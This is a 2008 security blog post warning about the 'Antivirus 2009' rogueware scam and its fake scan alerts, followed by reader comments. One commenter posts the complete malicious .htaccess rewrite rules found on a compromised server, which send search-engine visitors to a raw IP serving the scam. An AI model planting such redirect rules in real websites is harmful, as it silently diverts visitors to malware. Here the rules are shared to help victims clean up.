ThreatFire Research Blog Home
 
 
« AMTSO on eWeek
Microsoft Giving Away Live OneCare »

ATTENTION! If your computer is struck by the spyware, you could suffer

…from all sorts of bad things. We know.

However, you may be seeing this mis-spelled message, which has changed a little bit over the past few months:
“ATTENTION! If your computer is struck by the spyware, you could suffer data loss, erratic PC behaviour, PC freezes and creahes.”

By the spyware? Creahes? Who writes this stuff?

“Detect and remove viruses before they damage your computer!
Antivirus 2009 will perform a 100% FREE and quick scan of your computer for Viruses, Spyware and Adware.
Do you want to install Antivirus 2009 to scan your computer for malware now? (Recommended)”

Please be wary of this sort of scheme through the end of the year. A number of banner ads on very popular web sites have been redirecting users to sites serving up this garbage. This rogueware “Antivirus 2009″ ad in particular will re-direct your browser to a web site using only javascript to mis-represent a common online malware scan of your windows system. As we’ve discussed before and at Virus Bulletin (slides on flash here), this stuff will attempt to shock you with a number of malware detections that are not really present on your computer, coercing you to pay for phony AV software. They detect the make-believe “Spyware.IEMonster.b”, “Zlob.PornAdvertizer.Xplisit”, and “Trojan.Infostealer.Banker.s”, made-up names which unsurprisingly do not change:

This entry was posted on Monday, November 17th, 2008 at 5:12 pm and is filed under Adware, Rogueware. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

5 Responses to “ATTENTION! If your computer is struck by the spyware, you could suffer”

  1. Disk4mat says:
    November 17, 2008 at 10:27 pm

    LOL

    “The spyware” to imply there is only one out there. If only, if only right?

  2. Kurt says:
    November 17, 2008 at 11:54 pm

    Hah, right!

  3. redmapleleaf says:
    November 26, 2008 at 8:22 am

    This problem is a server side, not a client side. That is your computer is probably OK. My webserver has been infected with this problem and all my clients are suffering from it every time they connected to my website.

    Upon contacting my host, they were able to determine the problem which was in the .htaccess file. Some how this file was compromised on their server and start redirecting traffic to the site in Modova/Eastern Europe that you are seeing. Here is the content of the .htaccess file that responsible for this problem:

    RewriteEngine On
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
    RewriteRule .* http://89.28.13.203/in.html?s=jh [R,L]

    I hope this could help somebody from too much suffering.

  4. ThreatFire Blogger says:
    December 2, 2008 at 10:22 am

    redmapleleaf-

    Sorry to hear that your server was compromised, and thanks for posting that valuable information about htaccess.
    At the same time, the problem that is described in the post is a client issue. Your redirected site visitors unfortunately were coerced into downloading and running a file similar in name to “A9installer_880147.exe”, and then saw the problems described in the post on their system.

    Thanks again, and nice work cleaning up the issue on your site.

  5. Brad Peterson says:
    December 28, 2008 at 12:27 am

    In my case, it was the Vundo malware.

    I first tried finding and removing it with AVG anti-virus, Spybot, Lavasoft Ad-aware, Microsoft Defender, Vundo removal tool, and Hijackthis. They did very little finding it or giving me clues on how to remove it.

    I then tried Malwarebytes’ Anti-Malware, and that found a lot more, but not enough.

    The fix came from SuperAntiSpyware. That was far and away the best tool to find this bugger and remove it for good.

Leave a Reply

Click here to cancel reply.

 
  • Blog Archive

    • November 2009
    • October 2009
    • September 2009
    • August 2009
    • July 2009
    • June 2009
    • May 2009
    • April 2009
    • March 2009
    • February 2009
    • January 2009
    • December 2008
    • November 2008
    • October 2008
    • September 2008
    • August 2008
    • July 2008
    • June 2008
    • May 2008
    • April 2008
    • March 2008
    • February 2008
    • January 2008
    • December 2007
    • November 2007
    • October 2007
    • September 2007
    • August 2007
  • Search This Blog

  • RSS Subscribe Now

    • Koobface on Yuotube
    • Spamvertizing Social Networks and Why Legitimate Money Will Help Clean Them Up
    • Zbot: Not Your Typical Malware
  • Categories

  • About ThreatFire

    ThreatFire™, features innovative real-time behavioral protection technology that provides powerful standalone protection or the perfect complement to traditional signature-based antivirus programs.

    ThreatFire's patent-pending ActiveDefense™ technology offers unsurpassed protection against both known and unknown zero-day viruses, worms, trojans, rootkits, buffer overflows, spyware, adware and other malware.

    Learn more...

  • Blogroll

    • AV-Comparatives weblog
    • Bill Mullins’ Weblog – Tech Thoughts
    • Security Response Blogs
    • Swatkat’s rants
    • ThreatExpert Blog
  • Links

    • AMTSO
    • AV-Test
    • Frank Boldewin’s Reconstructor
    • PC Tools
    • ThreatExpert
    • ThreatFire
    • Virus Bulletin
 
Subscribe to:
Posts (Atom)
Entries (RSS) and Comments (RSS).